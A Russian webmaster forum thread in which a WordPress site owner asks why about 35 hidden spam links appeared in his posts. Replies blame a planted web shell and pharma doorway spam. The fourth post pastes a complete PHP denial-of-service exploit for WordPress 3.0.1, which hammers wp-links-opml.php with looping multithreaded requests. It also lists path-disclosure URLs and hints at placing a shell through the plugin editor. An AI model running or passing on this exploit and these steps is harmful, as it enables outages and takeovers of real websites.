|
|
Левые ссылки ниоткуда. |
|
Безопасность - Помощь в обнаружении и удалении вредоносного кода с сайта. Устранение последствий взлома. Все о веб безопасности. |
![]() |
|
Опции темы | Оценить тему | Опции просмотра |
![]() |
#1 |
|
![]() ![]() Не так давно сделал сайт на Вордпрессе. Выбрал тему более менее сносную, опубликовал около 50-и статей. Через некоторое время решил скормить сапе. В первые дни все было нормально, но через месяц я вновь залез на сапу и удивился - количество внешних ссылок с некоторых страниц моего сайты было равно 33-35!! Я удивляюсь, как Яша не отправил меня в бан. Но как?? Оказалось, что все эти ссылки прописаны прямо в коде статей опубликованных мной же. Сейчас я это дело поправил, но боюсь что на этом все не закончится. Может кто знает - в чем дело и что предпринять??
![]() ![]() мы все учились понемногу чему-нибудь и как-нибудь.
|
![]() |
![]() ![]() ![]() |
![]() |
#2 |
|
![]() в шелле дело, скорее всего. предпринять можно чистку своего движка от уязвимостей и шеллов.
зы а дорвеев на фарму небыло? у нас такое любят. Ссылки на такие доры раньше ныкали цветом фона или где-то хитро в исходнике. щас ее, как правило, пишут в сайтмап. В общем, цель - максимально долгая жизнь дорвея вместе со ссылкой на него, дабы сохранить вес партнерочки. |
![]() |
![]() ![]() ![]() |
![]() |
#3 |
|
![]() ![]() После текста самой статьи следовал код, который закрывался в noindex, а далее в диве перечисление всех 35-и ссылок, причем глядя на страницу невооруженным глазом - ссылок вообще не видно. У меня Опера определяет что закрыто от индексации, так она только маленький кубик выделяла в конце статьи (этот самый noindex), но ни 1-й ссылки видно не было, зато в исходном коде все красиво. Ссылки те поудалял, помню, что 1-н из них был "фильмы онлайн" что вообще не в тему.
Установлен WordPress 3.0.1 - может есть смысл обновиться до 3.2? И может быть баг в коде самой темы или это точно движок? ![]() мы все учились понемногу чему-нибудь и как-нибудь.
|
![]() |
![]() ![]() ![]() |
![]() |
#4 |
|
![]() Wordpress 3.0.1 - Remote Denial Of Service Exploit
Код:
<?php // Curl php5 ;) function info() { echo "################################################## ################\n"; echo "# Wordpress 3.0.1 - Remote Denial Of Service Exploit\n"; echo "# Author: KnocKout\n"; echo "# Greatz : DaiMon,BARCOD3\n"; echo "################################################## ################\n"; echo "# php poc.php target\n"; echo "# php poc.php http://www.victim.com/PATH/ 20 5\n"; echo "________________________________________\n"; exit; } if($argc !== 4 || !preg_match('#^\d+$#', $argv[2]) || !preg_match('#^\d+$#', $argv[3])) { info(); } $url = $argv[1]; $threads = (int) $argv[2]; $timeout = (int) $argv[3]; $ptimeout = $timeout * 100; $packet = implode('+', range(100,999)); while(1) { $m = curl_multi_init(); for($i = 0; $i < $threads; $i++) { $c[$i] = curl_init(); $opts = array ( CURLOPT_URL => $url . 'wp-links-opml.php?link_cat=--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0', CURLOPT_USERAGENT => 'Opera/9.80 (Windows NT 5.1; U; pl) Presto/2.5.24 Version/10.52', CURLOPT_ENCODING => 'gzip, deflate', CURLOPT_POST => 1, CURLOPT_POSTFIELDS => 'search_keywords='. $packet .'000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000', CURLOPT_RETURNTRANSFER => 1, CURLOPT_TIMEOUT => $timeout, ); curl_setopt_array($c[$i], $opts); curl_multi_add_handle($m, $c[$i]); } $t = 0; do { curl_multi_exec($m, $r); usleep(100000); $t++; if($t > $ptimeout) { curl_multi_close($m); for($i = 0; $i < $threads; $i++) { curl_close($c[$i]); } break; } } while($r > 0); echo '.'; } ?> Короче, возможностей взломать незадачливого веб-мастера очень много... плюс еще несколько... вот, кстати, раскрытие путей на твоем 3.0.1: Код:
http://localhost/wordpress/wp-admin/edit.php?post_type[]=page http://localhost/wordpress/wp-admin/options-general.php?page[]= http://localhost/wordpress/wp-admin/post-new.php?post_type[]=page http://localhost/wordpress/wp-admin/plugins.php?activate=true&plugin_status=all&paged[]=1 http://localhost/wordpress/wp-admin/plugin-editor.php?file[]= Код:
http://localhost/wordpress/wp-admin/plugin-editor.php?file=index.php по адресу site/wordpress/wp-content/plugins/ будет наш шелл. в тройке практически во всех php файлах присутствует ошибка обработки get_header();, что ведет к раскрытию путей, я у себя просто запретил вывод ошибок, добавив error_reporting (0);. ---------- ---------- можешь не менять двиг. можешь не менять. я не знаю человека, умеющего пользоваться всем тем, что я щас опубликовал и в то же время такого, что будет ломать маленькие ГС. куда лучше будет индексироваться дор на .гове или .едушке... но я бы апдгрейднул ![]() ---------- ---------- зы Дирижабль, если ты когда-то это прочтешь, то знай, что на очате ты только потеряешь время бестолково.. |
![]() |
![]() ![]() ![]() |
![]() |
|
Опции темы | |
Опции просмотра | Оценка этой теме |
|
|
![]() |
||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
Однопиксельные ссылки или ссылки точки | BAPOHA | Индексация сайта | 6 | 30.01.2011 21:37 |
Ссылки на сайт бесплатно. Часть II продолжаем получать обратные ссылки. | AndDREW | Продвижение ссылками | 7 | 25.11.2010 04:18 |
ПР ниоткуда | toff | Раскрутка в общих чертах | 18 | 23.11.2010 11:27 |
Левые зеркала доменов в Яндекс поиске | koreash | Яndex | 0 | 14.05.2009 13:52 |
|
Текущее время: 09:30. Часовой пояс GMT +3.
|